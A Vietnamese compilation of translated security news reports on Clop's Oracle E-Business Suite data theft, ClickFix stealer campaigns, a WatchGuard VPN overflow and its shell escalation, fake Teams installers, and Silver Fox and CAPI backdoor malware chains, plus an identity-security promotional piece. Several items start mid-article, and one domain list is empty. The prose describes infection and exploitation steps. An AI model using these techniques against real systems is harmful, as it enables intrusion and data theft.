Envoy Air chia sẻ với BleepingComputer rằng: "Chúng tôi đã biết về sự cố liên quan đến ứng dụng Oracle E-Business Suite của Envoy".

"Ngay khi biết được sự việc, chúng tôi đã ngay lập tức tiến hành điều tra và liên hệ với cơ quan thực thi pháp luật. Chúng tôi đã tiến hành xem xét kỹ lưỡng dữ liệu liên quan và xác nhận không có dữ liệu nhạy cảm hoặc dữ liệu khách hàng nào bị ảnh hưởng. Một lượng nhỏ thông tin doanh nghiệp và thông tin liên hệ thương mại có thể đã bị xâm phạm."

Envoy Air là công ty con của American Airlines và khai thác các chuyến bay khu vực dưới thương hiệu American Eagle. Mặc dù hoạt động như một công ty riêng biệt, Envoy Air vẫn được tích hợp vào mạng lưới của American về bán vé, đặt lịch bay và dịch vụ hành khách.

Nhóm ransomware Clop hiện đang tiết lộ những gì chúng cho là dữ liệu bị đánh cắp từ Envoy trên trang web rò rỉ dữ liệu của mình, tuyên bố rằng, "Công ty không quan tâm đến khách hàng của mình, họ đã phớt lờ vấn đề bảo mật của họ!!!"

Sự cố bảo mật mới này có liên quan đến chiến dịch đánh cắp dữ liệu vào tháng 8 do nhóm tống tiền Clop thực hiện. Nhóm này bắt đầu gửi email yêu cầu tống tiền tới các công ty vào tháng 9, tuyên bố đã đánh cắp dữ liệu từ hệ thống Oracle E-Business Suite.

Trong khi Oracle ban đầu tuyên bố rằng những kẻ tấn công đang khai thác các lỗ hổng đã được vá vào tháng 7, thì sau đó công ty tiết lộ rằng nhóm tống tiền đã khai thác lỗ hổng zero-day được theo dõi là CVE-2025-61882 trong các cuộc tấn công.

CrowdStrike và Mandiant sau đó tiết lộ rằng Clop đã khai thác lỗ hổng này vào đầu tháng 8 để xâm nhập hệ thống và triển khai phần mềm độc hại.

Trong khi Clop không chia sẻ có bao nhiêu công ty bị ảnh hưởng bởi các cuộc tấn công đánh cắp dữ liệu, John Hultquist của Google đã trả lời BleepingComputer qua email rằng họ tin rằng có hàng chục tổ chức đã bị ảnh hưởng.

Băng đảng Clop cũng đang tống tiền Đại học Harvard như một phần của chiến dịch đánh cắp dữ liệu này, khi trường đại học xác nhận với BleepingComputer rằng sự cố này chỉ ảnh hưởng đến "một số lượng hạn chế các bên liên quan đến một đơn vị hành chính nhỏ".

Tuần trước, Oracle đã âm thầm vá một lỗ hổng zero-day khác của E-Business Suite có tên CVE-2025-61884 mà không tiết lộ rằng lỗ hổng này đã bị khai thác tích cực vào tháng 7 năm 2025.

Lỗ hổng zero-day này có liên quan đến một lỗ hổng bị nhóm tống tiền Shiny Lapsus$ Hunters rò rỉ trên Telegram.

Trước đó, American Airlines đã bị vi phạm dữ liệu vào năm 2022 và 2023 khiến thông tin cá nhân của nhân viên bị lộ.

Clop là ai?

Hoạt động ransomware Clop, còn được theo dõi là TA505, Cl0p và FIN11, được triển khai vào năm 2019 khi nó bắt đầu xâm nhập vào mạng lưới công ty để triển khai một biến thể của ransomware CryptoMix và đánh cắp dữ liệu.

Từ năm 2020, băng nhóm tống tiền đã chuyển từ chủ yếu sử dụng ransomware sang khai thác lỗ hổng zero-day trong các nền tảng lưu trữ dữ liệu hoặc truyền tệp an toàn để đánh cắp dữ liệu.

Một số cuộc tấn công sử dụng lỗ hổng zero-day của chúng bao gồm:

• 2020: Khai thác lỗ hổng zero-day trong nền tảng Accellion FTA , ảnh hưởng đến gần 100 tổ chức.

• 2021: Khai thác lỗ hổng zero-day trong phần mềm FTP SolarWinds Serv-U .

• 2023: Khai thác lỗ hổng zero-day trong nền tảng GoAnywhere MFT , xâm phạm hơn 100 công ty.

• 2023: Khai thác lỗ hổng zero-day trong MOVEit Transfer là chiến dịch lớn nhất của Clop cho đến nay, trong đó lỗ hổng zero-day này cho phép đánh cắp dữ liệu từ 2.773 tổ chức trên toàn thế giới .

• 2024: Khai thác hai lỗ hổng zero-day trong chuyển tập tin Cleo (CVE-2024-50623 và CVE-2024-55956) để đánh cắp dữ liệu và tống tiền các công ty.

Bộ Ngoại giao Hoa Kỳ hiện đang treo thưởng 10 triệu đô la cho thông tin liên hệ các hoạt động ransomware của Clop với một chính phủ nước ngoài.

Theo : Bleeping Computer ^® LLC

Chiến dịch này sử dụng kỹ thuật “ClickFix” trong đó mục tiêu bị lừa thực hiện lệnh trong Terminal, khiến họ bị nhiễm phần mềm độc hại.

Homebrew là một hệ thống quản lý gói mã nguồn mở phổ biến giúp việc cài đặt phần mềm trên macOS và Linux trở nên dễ dàng hơn. Trước đây, kẻ tấn công đã lợi dụng tên nền tảng này để phát tán AMOS trong các chiến dịch quảng cáo độc hại.

LogMeIn là dịch vụ truy cập từ xa, còn TradingView là nền tảng phân tích thị trường và biểu đồ tài chính, cả hai đều được người dùng Apple sử dụng rộng rãi.

Các nhà nghiên cứu tại công ty săn mối đe dọa Hunt.io đã xác định được hơn 85 tên miền mạo danh ba nền tảng trong chiến dịch này, bao gồm:

Khi kiểm tra một số tên miền, BleepingComputer phát hiện ra rằng trong một số trường hợp, lưu lượng truy cập vào các trang web được điều hướng thông qua Google Ads, cho thấy kẻ tấn công đã quảng cáo các trang web đó để chúng xuất hiện trong kết quả Tìm kiếm của Google.

Các nhà nghiên cứu cho biết , các trang web độc hại có cổng tải xuống ứng dụng giả mạo rất hấp dẫn và hướng dẫn người dùng sao chép lệnh curl trong Terminal để cài đặt ứng dụng.

Trang ClickFix theo chủ đề Homebrew
Nguồn: Hunt.io

Trong những trường hợp khác, như đối với TradingView, các lệnh độc hại được hiển thị dưới dạng "bước xác nhận bảo mật kết nối". Tuy nhiên, nếu người dùng nhấp vào nút "sao chép", lệnh cài đặt được mã hóa base64 sẽ được gửi đến bảng tạm thay vì ID xác minh Cloudflare được hiển thị.

Trang TradingView giả mạo
Nguồn: Hunt.io

Các lệnh này sẽ tìm nạp và giải mã tệp 'install.sh', tải xuống tệp nhị phân tải trọng, xóa cờ kiểm dịch và bỏ qua lời nhắc của Gatekeeper để cho phép thực thi.

Tải trọng là AMOS hoặc Odyssey, được thực thi trên máy sau khi kiểm tra xem môi trường là máy ảo hay hệ thống phân tích.

Phần mềm độc hại này sẽ gọi sudo để chạy lệnh với tư cách root và hành động đầu tiên của nó là thu thập thông tin chi tiết về phần cứng và bộ nhớ của máy chủ.

Tiếp theo, nó thao túng các dịch vụ hệ thống như tắt daemon cập nhật OneDrive và tương tác với các dịch vụ macOS XPC để kết hợp hoạt động độc hại với các quy trình hợp pháp.

Cuối cùng, các thành phần đánh cắp thông tin của phần mềm độc hại được kích hoạt, thu thập thông tin nhạy cảm được lưu trữ trên trình duyệt, thông tin đăng nhập tiền điện tử và xâm nhập vào hệ thống chỉ huy và kiểm soát (C2).

AMOS, được ghi nhận lần đầu tiên vào tháng 4 năm 2023, là một phần mềm độc hại dạng dịch vụ (MaaS) có sẵn với mức phí đăng ký 1.000 đô la/tháng. Nó có thể đánh cắp một loạt dữ liệu từ các máy chủ bị nhiễm.

Gần đây, những người tạo ra nó đã thêm một thành phần cửa hậu vào phần mềm độc hại để cung cấp cho người điều khiển khả năng truy cập liên tục từ xa.

Odyssey Stealer, được các nhà nghiên cứu CYFIRMA ghi nhận vào mùa hè này, là một họ tương đối mới có nguồn gốc từ Poseidon Stealer, vốn được phân nhánh từ AMOS.

Nó nhắm mục tiêu vào thông tin đăng nhập và cookie được lưu trữ trong trình duyệt Chrome, Firefox và Safari, hơn một trăm tiện ích mở rộng ví tiền điện tử, dữ liệu Keychain và tệp cá nhân, sau đó gửi chúng cho kẻ tấn công ở định dạng ZIP.

Người dùng được khuyến cáo không nên dán các lệnh Terminal tìm thấy trực tuyến nếu họ không hiểu đầy đủ về những gì chúng làm.

Theo : Bleeping Computer ^® LLC

Đây không phải là một viễn tưởng đen tối nào đó - giờ là thứ Ba ở văn phòng. Chúng ta đã bước vào một giai đoạn mới, nơi các tác nhân AI tự động hoạt động với các đặc quyền hệ thống nghiêm ngặt. Chúng thực thi mã, xử lý các tác vụ phức tạp và truy cập dữ liệu nhạy cảm với quyền tự chủ chưa từng có. Chúng không ngủ, không hỏi han, và không phải lúc nào cũng chờ đợi sự cho phép.

Thật mạnh mẽ. Nhưng cũng đầy rủi ro. Bởi vì các mối đe dọa doanh nghiệp ngày nay vượt xa những trò lừa đảo và phần mềm độc hại thông thường. Vậy ranh giới bảo mật hiện đại là gì? Tất cả nằm ở việc quản lý danh tính. Đây là câu hỏi trị giá hàng triệu đô la mà mọi CISO nên tự hỏi: Ai hoặc cái gì có quyền truy cập vào các hệ thống quan trọng của bạn, bạn có thể bảo mật và quản lý quyền truy cập đó không, và bạn có thể thực sự chứng minh được điều đó không?

Làm thế nào danh tính trở thành vành đai an ninh mới#

Bạn còn nhớ những mô hình bảo mật kiểu cũ được xây dựng xung quanh tường lửa và bảo vệ điểm cuối không? Chúng đã từng phục vụ mục đích của mình — nhưng chúng không được thiết kế để đối phó với các mối đe dọa phân tán, dựa trên danh tính mà chúng ta đang phải đối mặt ngày nay. Danh tính đã trở thành điểm kiểm soát trung tâm, tạo nên những kết nối phức tạp giữa người dùng, hệ thống và kho lưu trữ dữ liệu. Báo cáo SailPoint Horizons of Identity Security 2025-2026 cho thấy quản lý danh tính đã phát triển từ một hoạt động kiểm soát hậu cần trở thành nhiệm vụ then chốt đối với doanh nghiệp hiện đại.

Sự bùng nổ của các tác nhân AI, hệ thống tự động và danh tính phi con người đã mở rộng đáng kể phạm vi tấn công của chúng ta. Những thực thể này hiện là các vectơ tấn công chính. Đây là một sự thật đáng suy ngẫm: Chưa đến 4 trong 10 tác nhân AI được quản lý bởi các chính sách bảo mật danh tính, để lại một lỗ hổng đáng kể trong khuôn khổ bảo mật doanh nghiệp. Các tổ chức không có khả năng hiển thị danh tính toàn diện? Họ không chỉ dễ bị tấn công mà còn là mục tiêu dễ bị tấn công.

Mỏ vàng chiến lược của bảo mật danh tính trưởng thành#

Nhưng đây mới là điều thú vị. Bất chấp những thách thức ngày càng gia tăng, vẫn có một cơ hội lớn cho các tổ chức triển khai bảo mật danh tính đúng cách. Báo cáo Horizons of Identity Security tiết lộ một điều thú vị: Các tổ chức luôn đạt được ROI cao nhất từ ​​các chương trình bảo mật danh tính so với mọi lĩnh vực bảo mật khác. Họ xếp hạng Quản lý Danh tính và Truy cập là khoản đầu tư bảo mật có ROI cao nhất, gấp đôi so với các hạng mục bảo mật khác.

Tại sao? Bởi vì bảo mật danh tính trưởng thành có chức năng kép - nó ngăn chặn vi phạm, đồng thời thúc đẩy hiệu quả hoạt động và tạo ra các năng lực kinh doanh mới. Các tổ chức có chương trình nhận dạng trưởng thành, đặc biệt là những tổ chức sử dụng các tính năng do AI điều khiển và đồng bộ hóa dữ liệu nhận dạng theo thời gian thực, cho thấy khả năng tiết kiệm chi phí và giảm thiểu rủi ro tốt hơn đáng kể. Các tổ chức trưởng thành có khả năng sở hữu các tính năng hỗ trợ AI như Phát hiện và Phản hồi Mối đe dọa Danh tính cao gấp bốn lần.

Sự chia rẽ bản sắc lớn#

Đây chính là điểm đáng lo ngại: Khoảng cách ngày càng lớn giữa các tổ chức đã có chương trình nhận dạng hoàn thiện và các tổ chức vẫn đang loay hoay tìm cách bắt kịp. Báo cáo Horizons of Identity Security cho thấy 63% tổ chức đang mắc kẹt ở giai đoạn đầu của quá trình hoàn thiện bảo mật nhận dạng (Horizons 1 hoặc 2). Những tổ chức này không chỉ bỏ lỡ mà còn phải đối mặt với nhiều rủi ro hơn trước các mối đe dọa hiện đại.

Khoảng cách này ngày càng nới rộng do yêu cầu ngày càng cao. Khung năng lực năm 2025 đã bổ sung bảy yêu cầu năng lực mới để giải quyết các mối đe dọa mới nổi. Các tổ chức không nâng cao năng lực nhận dạng không chỉ đứng yên mà thực chất đang thụt lùi. Các tổ chức gặp phải tình trạng thoái lui năng lực cho thấy tỷ lệ áp dụng quản lý danh tính tác nhân AI thấp hơn đáng kể.

Thách thức này không chỉ giới hạn ở công nghệ. Chỉ 25% tổ chức coi IAM là một công cụ hỗ trợ chiến lược cho hoạt động kinh doanh—số còn lại chỉ coi nó như một tiêu chí bảo mật hoặc yêu cầu tuân thủ khác. Quan điểm hạn hẹp này hạn chế nghiêm trọng tiềm năng chuyển đổi và khiến các tổ chức dễ bị tấn công tinh vi.

Đã đến lúc kiểm tra thực tế#

Bối cảnh mối đe dọa đang phát triển với tốc độ chóng mặt, với mức độ rủi ro chưa từng có trên tất cả các lĩnh vực. Bảo mật danh tính đã phát triển từ một thành phần bảo mật đơn thuần thành cốt lõi của bảo mật doanh nghiệp. Các tổ chức cần đánh giá một cách trung thực mức độ sẵn sàng của mình để quản lý việc triển khai tác nhân AI quy mô lớn và truy cập hệ thống tự động.

Đánh giá chủ động về tình hình bảo mật danh tính hiện tại của bạn sẽ cung cấp cái nhìn sâu sắc quan trọng về mức độ sẵn sàng của tổ chức và vị thế cạnh tranh.

Theo : TheHackerNews

Lỗ hổng bảo mật được theo dõi là CVE-2025-9242 (điểm CVSS: 9,3), được mô tả là lỗ hổng ghi ngoài giới hạn ảnh hưởng đến Fireware OS 11.10.2 đến và bao gồm 11.12.4_Update1, 12.0 đến và bao gồm 12.11.3 và 2025.1.

"Một lỗ hổng ghi ngoài giới hạn (out-of-bounds write) trong quy trình iked của WatchGuard Fireware OS có thể cho phép kẻ tấn công từ xa không được xác thực thực thi mã tùy ý", WatchGuard cho biết trong một khuyến cáo được phát hành tháng trước. "Lỗ hổng này ảnh hưởng đến cả VPN người dùng di động với IKEv2 và VPN văn phòng chi nhánh sử dụng IKEv2 khi được cấu hình với một cổng ngang hàng động."

Vấn đề này đã được giải quyết trong các phiên bản sau -

• 2025.1 - Đã sửa trong 2025.1.1

• 12.x - Đã sửa trong 12.11.4

• 12.3.1 (Phiên bản được chứng nhận FIPS) - Đã sửa trong 12.3.1_Update3 (B722811)

• 12.5.x (các mẫu T15 & T35) - Đã sửa trong 12.5.13)

• 11.x - Đã kết thúc vòng đời

Một phân tích mới từ watchTowr Labs đã mô tả CVE-2025-9242 là "tất cả các đặc điểm mà các băng nhóm ransomware thân thiện trong khu phố của bạn thích thấy", bao gồm cả việc nó ảnh hưởng đến dịch vụ được kết nối internet, có thể khai thác mà không cần xác thực và có thể thực thi mã tùy ý trên thiết bị ngoại vi.

Theo nhà nghiên cứu bảo mật McCaulay Hudson, lỗ hổng bảo mật bắt nguồn từ hàm "ike2_ProcessPayload_CERT" có trong tệp "src/ike/iked/v2/ike2_payload_cert.c" được thiết kế để sao chép "nhận dạng" máy khách vào bộ đệm ngăn xếp cục bộ có kích thước 520 byte, sau đó xác thực chứng chỉ SSL máy khách được cung cấp.

Sự cố phát sinh do thiếu kiểm tra độ dài trên bộ đệm nhận dạng, do đó cho phép kẻ tấn công kích hoạt tràn dữ liệu và thực thi mã từ xa trong giai đoạn IKE_SA_AUTH của quy trình bắt tay được sử dụng để thiết lập đường hầm mạng riêng ảo (VPN) giữa máy khách và dịch vụ VPN của WatchGuard thông qua giao thức quản lý khóa IKE.

Hudson cho biết : "Máy chủ sẽ thử xác thực chứng chỉ, nhưng quá trình xác thực đó diễn ra sau khi mã dễ bị tấn công chạy, khiến đường dẫn mã dễ bị tấn công của chúng tôi có thể truy cập được trước khi xác thực" .

WatchTowr lưu ý rằng mặc dù WatchGuard Fireware OS không có shell tương tác như "/bin/bash", nhưng kẻ tấn công có thể lợi dụng lỗ hổng này và kiểm soát thanh ghi con trỏ lệnh (hay còn gọi là RIP hoặc bộ đếm chương trình) để cuối cùng tạo ra shell tương tác Python qua TCP bằng cách tận dụng lệnh gọi hệ thống mprotect() , bỏ qua các biện pháp giảm thiểu bit NX (hay còn gọi là bit không thực thi).

Sau khi shell Python từ xa, bước đệm có thể được nâng cấp hơn nữa thông qua quy trình nhiều bước để có được shell Linux đầy đủ -

• Thực hiện trực tiếp lệnh execve trong Python để gắn lại hệ thống tệp dưới dạng đọc/ghi

• Tải xuống tệp nhị phân busybox BusyBox vào mục tiêu

• Liên kết tượng trưng /bin/sh với tệp nhị phân BusyBox

Sự phát triển này diễn ra sau khi watchTowr chứng minh rằng một lỗ hổng từ chối dịch vụ (DoS) hiện đã được khắc phục ảnh hưởng đến Progress Telerik UI cho AJAX ( CVE-2025-3600 , điểm CVSS: 7.5) cũng có thể cho phép thực thi mã từ xa tùy thuộc vào môi trường mục tiêu. Lỗ hổng này đã được Progress Software khắc phục vào ngày 30 tháng 4 năm 2025.

Nhà nghiên cứu bảo mật Piotr Bazydlo cho biết : "Tùy thuộc vào cơ sở mã mục tiêu – ví dụ, sự hiện diện của các trình xây dựng không có đối số, trình hoàn thiện hoặc trình giải quyết hợp ngữ không an toàn – tác động có thể leo thang đến việc thực thi mã từ xa" .

Đầu tháng này, Sina Kheirkhah của watchtower cũng đã làm sáng tỏ một lỗ hổng tiêm lệnh xác thực trước nghiêm trọng trong Dell UnityVSA ( CVE-2025-36604 , điểm CVSS: 9,8/7,3) có thể dẫn đến việc thực thi lệnh từ xa. Dell đã khắc phục lỗ hổng này vào tháng 7 năm 2025 sau khi công bố lỗi vào ngày 28 tháng 3.

Theo : TheHackerNews

Nhóm Microsoft Threat Intelligence cho biết trong bài đăng chia sẻ trên X rằng các chứng chỉ này "đã được sử dụng trong các tệp thiết lập Teams giả để phân phối cửa hậu Oyster và cuối cùng triển khai phần mềm tống tiền Rhysida".

Gã khổng lồ công nghệ cho biết họ đã ngăn chặn hoạt động này vào đầu tháng này sau khi bị phát hiện vào cuối tháng 9 năm 2025. Ngoài việc thu hồi chứng chỉ, các giải pháp bảo mật của họ đã được cập nhật để đánh dấu các chữ ký liên quan đến tệp thiết lập giả mạo, cửa hậu Oyster và phần mềm tống tiền Rhysida.

Vanilla Tempest (trước đây là Storm-0832) là tên gọi của một tác nhân đe dọa có động cơ tài chính còn được gọi là Vice Society và Vice Spider, được đánh giá là hoạt động ít nhất từ ​​tháng 7 năm 2022, phát tán nhiều loại ransomware khác nhau như BlackCat, Quantum Locker, Zeppelin và Rhysida trong nhiều năm qua.

Mặt khác, Oyster (hay còn gọi là Broomstick và CleanUpLoader) là một cửa hậu thường được phân phối thông qua các trình cài đặt trojan cho các phần mềm phổ biến như Google Chrome và Microsoft Teams bằng cách sử dụng các trang web giả mạo mà người dùng tình cờ tìm thấy khi tìm kiếm các chương trình trên Google và Bing.

Microsoft cho biết: "Trong chiến dịch này, Vanilla Tempest đã sử dụng các tệp MSTeamsSetup.exe giả mạo được lưu trữ trên các tên miền độc hại mô phỏng Microsoft Teams, ví dụ: teams-download[.]buzz, teams-install[.]run hoặc teams-download[.]top. Người dùng có thể bị chuyển hướng đến các trang web tải xuống độc hại bằng cách sử dụng thủ thuật đầu độc tối ưu hóa công cụ tìm kiếm (SEO)."

Để ký các trình cài đặt này và các công cụ sau khi xâm phạm khác, tác nhân đe dọa được cho là đã sử dụng Trusted Signing cũng như các dịch vụ ký mã SSL[.]com, DigiCert và GlobalSign.

Chi tiết về chiến dịch này lần đầu tiên được Blackpoint Cyber ​​tiết lộ vào tháng trước, nêu bật cách người dùng tìm kiếm Teams trực tuyến bị chuyển hướng đến các trang tải xuống giả mạo, nơi họ được cung cấp tệp MSTeamsSetup.exe độc ​​hại thay vì tệp ứng dụng hợp pháp.

"Hoạt động này cho thấy sự lạm dụng liên tục của SEO và quảng cáo độc hại để cung cấp các cửa hậu thương mại dưới vỏ bọc phần mềm đáng tin cậy", công ty cho biết. "Các tác nhân đe dọa đang lợi dụng lòng tin của người dùng vào kết quả tìm kiếm và các thương hiệu nổi tiếng để giành quyền truy cập ban đầu."

Để giảm thiểu những rủi ro này, bạn chỉ nên tải phần mềm từ những nguồn đã được xác minh và tránh nhấp vào các liên kết đáng ngờ được cung cấp thông qua quảng cáo trên công cụ tìm kiếm.

Theo : TheHackerNews

"Chiến dịch này dựa trên các email lừa đảo có chứa tệp PDF chứa các liên kết độc hại được nhúng", Pei Han Liao, nhà nghiên cứu tại FortiGuard Labs của Fortinet, cho biết trong một báo cáo được chia sẻ với The Hacker News. "Những tệp này được ngụy trang thành tài liệu chính thức của Bộ Tài chính và bao gồm nhiều liên kết ngoài tệp đã phân phối Winos 4.0."

Winos 4.0 là một họ phần mềm độc hại thường lây lan thông qua lừa đảo và đầu độc tối ưu hóa công cụ tìm kiếm (SEO), hướng người dùng không nghi ngờ đến các trang web giả mạo dưới dạng phần mềm phổ biến như Google Chrome, Telegram, Youdao, Sogou AI, WPS Office và DeepSeek, cùng nhiều phần mềm khác.

Việc sử dụng Winos 4.0 chủ yếu liên quan đến một nhóm tội phạm mạng "hung hăng" của Trung Quốc có tên là Silver Fox, cũng được theo dõi với tên gọi SwimSnake, The Great Thief of Valley (hay Valley Thief), UTG-Q-1000 và Void Arachne.

Tháng trước, Check Point đã xác định tác nhân đe dọa này đã lợi dụng một trình điều khiển dễ bị tấn công chưa từng được biết đến trước đây có liên quan đến WatchDog Anti-malware như một phần của cuộc tấn công Bring Your Own Vulnerable Driver (BYOVD) nhằm vô hiệu hóa phần mềm bảo mật được cài đặt trên các máy chủ bị xâm phạm.

Vài tuần sau, Fortinet đã làm sáng tỏ một chiến dịch khác diễn ra vào tháng 8 năm 2025, lợi dụng việc đầu độc SEO để phân phối HiddenGh0st và các mô-đun liên quan đến phần mềm độc hại Winos.

Công ty an ninh mạng và một nhà nghiên cứu bảo mật có tên somedieyoungZZ cũng đã ghi nhận việc Silver Fox nhắm mục tiêu vào Đài Loan và Nhật Bản bằng HoldingHands RAT vào tháng 6, trong đó những kẻ tấn công sử dụng email lừa đảo có chứa tài liệu PDF có cài bẫy để kích hoạt quá trình lây nhiễm nhiều giai đoạn, cuối cùng là triển khai trojan.

Điều đáng chú ý ở giai đoạn này là cả Winos 4.0 và HoldingHands RAT đều lấy cảm hứng từ một phần mềm độc hại RAT khác có tên là Gh0st RAT , mã nguồn của phần mềm này bị rò rỉ vào năm 2008 và kể từ đó đã được nhiều nhóm tin tặc Trung Quốc áp dụng rộng rãi.

Fortinet cho biết họ đã xác định được các tài liệu PDF giả dạng là bản dự thảo quy định thuế dành cho Đài Loan, trong đó có URL đến một trang web tiếng Nhật ("twsww[.]xin/download[.]html"), từ đó nạn nhân được nhắc tải xuống kho lưu trữ ZIP chịu trách nhiệm phân phối HoldingHands RAT.

Cuộc điều tra sâu hơn đã phát hiện ra các cuộc tấn công nhắm vào Trung Quốc, sử dụng các tài liệu Microsoft Excel có chủ đề về thuế làm mồi nhử, một số có từ tháng 3 năm 2024, để phân phối Winos. Tuy nhiên, các chiến dịch lừa đảo gần đây đã chuyển trọng tâm sang Malaysia, sử dụng các trang đích giả mạo để lừa người nhận tải xuống HoldingHands RAT.

Điểm khởi đầu là một tệp thực thi tự xưng là tài liệu kiểm toán thuế tiêu thụ đặc biệt. Nó được sử dụng để tải một tệp DLL độc hại, hoạt động như một trình tải shellcode cho "sw.dat", một payload được thiết kế để chạy kiểm tra chống máy ảo (VM), liệt kê các quy trình đang hoạt động dựa trên danh sách các sản phẩm bảo mật từ Avast, Norton và Kaspersky, và chấm dứt chúng nếu tìm thấy, leo thang đặc quyền và chấm dứt Trình lập lịch tác vụ.

Nó cũng thả một số tập tin khác vào thư mục C:\Windows\System32 của hệ thống -

• svchost.ini, chứa Địa chỉ ảo tương đối (RVA) của hàm VirtualAlloc

• TimeBrokerClient.dll, TimeBrokerClient.dll hợp lệ được đổi tên thành BrokerClientCallback.dll.

• msvchost.dat, chứa shellcode được mã hóa

• system.dat, chứa dữ liệu được mã hóa

• wkscli.dll, một DLL chưa sử dụng

"Trình Lập Lịch Tác Vụ là một dịch vụ Windows được lưu trữ bởi svchost.exe, cho phép người dùng kiểm soát thời điểm chạy các tác vụ hoặc quy trình cụ thể", Fortinet cho biết. "Cài đặt khôi phục của Trình Lập Lịch Tác Vụ được cấu hình để khởi động lại dịch vụ một phút sau khi lỗi mặc định."

"Khi Task Scheduler được khởi động lại, svchost.exe sẽ được thực thi và tải TimeBrokerClient.dll độc hại. Cơ chế kích hoạt này không yêu cầu khởi chạy trực tiếp bất kỳ quy trình nào, khiến việc phát hiện dựa trên hành vi trở nên khó khăn hơn."

Chức năng chính của "TimeBrokerClient.dll" là phân bổ bộ nhớ cho shellcode được mã hóa trong "msvchost.dat" bằng cách gọi hàm VirtualAlloc() sử dụng giá trị RVA được chỉ định trong "svchost.ini". Ở giai đoạn tiếp theo, "msvchost.dat" giải mã dữ liệu được lưu trữ trong "system.dat" để truy xuất dữ liệu HoldingHands.

HoldingHands được trang bị để kết nối với máy chủ từ xa, gửi thông tin máy chủ đến đó, gửi tín hiệu nhịp tim mỗi 60 giây để duy trì kết nối, đồng thời nhận và xử lý các lệnh do kẻ tấn công đưa ra trên hệ thống bị nhiễm. Các lệnh này cho phép phần mềm độc hại thu thập thông tin nhạy cảm, chạy các lệnh tùy ý và tải xuống các tải trọng bổ sung.

Một tính năng mới được bổ sung là lệnh mới cho phép cập nhật địa chỉ chỉ huy và điều khiển (C2) được sử dụng để liên lạc thông qua mục nhập Windows Registry.

Chiến dịch Silk Lure nhắm vào Trung Quốc với ValleyRAT#

Sự việc diễn ra trong bối cảnh Seqrite Labs đã công bố chi tiết về một chiến dịch lừa đảo qua email đang diễn ra, lợi dụng cơ sở hạ tầng C2 được lưu trữ tại Hoa Kỳ, nhắm mục tiêu vào các công ty Trung Quốc trong lĩnh vực công nghệ tài chính, tiền điện tử và nền tảng giao dịch để cuối cùng triển khai Winos 4.0. Chiến dịch này được đặt tên mã là Chiến dịch Mồi nhử Tơ lụa (Operation Silk Lure), do có dấu vết liên quan đến Trung Quốc.

Các nhà nghiên cứu Dixit Panchal, Soumen Burma và Kartik Jivani cho biết : "Kẻ thù tạo ra các email có mục tiêu cao mạo danh người tìm việc và gửi đến phòng nhân sự và nhóm tuyển dụng kỹ thuật trong các công ty Trung Quốc" .

"Những email này thường chứa các tệp .LNK (lối tắt Windows) độc hại được nhúng trong các hồ sơ xin việc hoặc tài liệu hồ sơ có vẻ hợp lệ. Khi được thực thi, các tệp .LNK này hoạt động như những trình thả mã độc, khởi tạo các tải trọng tạo điều kiện cho việc xâm nhập ban đầu."

Khi được khởi chạy, tệp LNK sẽ chạy mã PowerShell để tải xuống một bản lý lịch PDF giả mạo, đồng thời lén lút thả thêm ba payload vào thư mục "C:\Users\<user>\AppData\Roaming\Security" và thực thi nó. Các bản lý lịch PDF này được bản địa hóa và điều chỉnh cho các mục tiêu ở Trung Quốc nhằm tăng khả năng thành công của cuộc tấn công kỹ thuật xã hội.

Các tải trọng được thả như sau:

• CreateHiddenTask.vbs, tạo ra một tác vụ theo lịch trình để khởi chạy "keytool.exe" vào lúc 8:00 sáng hàng ngày

• keytool.exe, sử dụng tải phụ DLL để tải jli.dll

• jli.dll, một DLL độc hại khởi chạy phần mềm độc hại Winos 4.0 được mã hóa và nhúng trong keytool.exe

"Phần mềm độc hại được triển khai sẽ thiết lập sự tồn tại dai dẳng trong hệ thống bị xâm nhập và khởi động nhiều hoạt động do thám khác nhau", các nhà nghiên cứu cho biết. "Các hoạt động này bao gồm chụp ảnh màn hình, thu thập nội dung clipboard và đánh cắp siêu dữ liệu quan trọng của hệ thống."

Trojan này cũng sử dụng nhiều kỹ thuật khác nhau để tránh bị phát hiện, bao gồm cả việc cố gắng gỡ cài đặt các sản phẩm diệt vi-rút đã phát hiện và chấm dứt kết nối mạng liên quan đến các chương trình bảo mật như Kingsoft Antivirus, Huorong hoặc 360 Total Security để can thiệp vào các chức năng thông thường của chúng.

Các nhà nghiên cứu cho biết thêm: "Thông tin bị rò rỉ này làm tăng đáng kể nguy cơ gián điệp mạng, đánh cắp danh tính và xâm phạm thông tin đăng nhập, do đó gây ra mối đe dọa nghiêm trọng cho cả cơ sở hạ tầng của tổ chức và quyền riêng tư của cá nhân".

Theo : TheHackerNews

Theo Seqrite Labs , chuỗi tấn công bao gồm việc phát tán email lừa đảo chứa tệp ZIP như một cách để kích hoạt lây nhiễm. Phân tích của công ty an ninh mạng này dựa trên hiện vật ZIP được tải lên nền tảng VirusTotal vào ngày 3 tháng 10 năm 2025.

Trong kho lưu trữ có một tài liệu giả bằng tiếng Nga được cho là thông báo liên quan đến luật thuế thu nhập và một tệp lối tắt Windows (LNK).

Tệp LNK có cùng tên với tệp ZIP (tức là "Перерасчет заработной платы 01.10.2025"), chịu trách nhiệm thực thi phần mềm cấy ghép .NET ("adobe.dll") bằng cách sử dụng tệp nhị phân Microsoft hợp pháp có tên " rundll32.exe ", một kỹ thuật sống ngoài thực địa (LotL) được các tác nhân đe dọa sử dụng .

Seqrite lưu ý rằng backdoor này có các chức năng kiểm tra xem nó có đang chạy với quyền quản trị viên hay không, thu thập danh sách các sản phẩm diệt vi-rút đã cài đặt và mở tài liệu giả mạo như một thủ thuật, trong khi nó sẽ bí mật kết nối với máy chủ từ xa ("91.223.75[.]96") để nhận thêm lệnh thực thi.

Các lệnh cho phép CAPI Backdoor đánh cắp dữ liệu từ các trình duyệt web như Google Chrome, Microsoft Edge và Mozilla Firefox; chụp ảnh màn hình; thu thập thông tin hệ thống; liệt kê nội dung thư mục; và truyền kết quả trở lại máy chủ.

Nó cũng cố gắng chạy một danh sách dài các kiểm tra để xác định xem đó có phải là máy chủ hợp pháp hay máy ảo và sử dụng hai phương pháp để thiết lập tính bền bỉ, bao gồm thiết lập tác vụ theo lịch trình và tạo tệp LNK trong thư mục Khởi động Windows để tự động khởi chạy DLL cửa sau được sao chép vào thư mục Windows Roaming.

Đánh giá của Seqrite rằng tác nhân đe dọa đang nhắm vào ngành công nghiệp ô tô của Nga là do một trong những tên miền có liên quan đến chiến dịch này có tên là carprlce[.]ru, có vẻ như mạo danh "carprice[.]ru" hợp pháp.

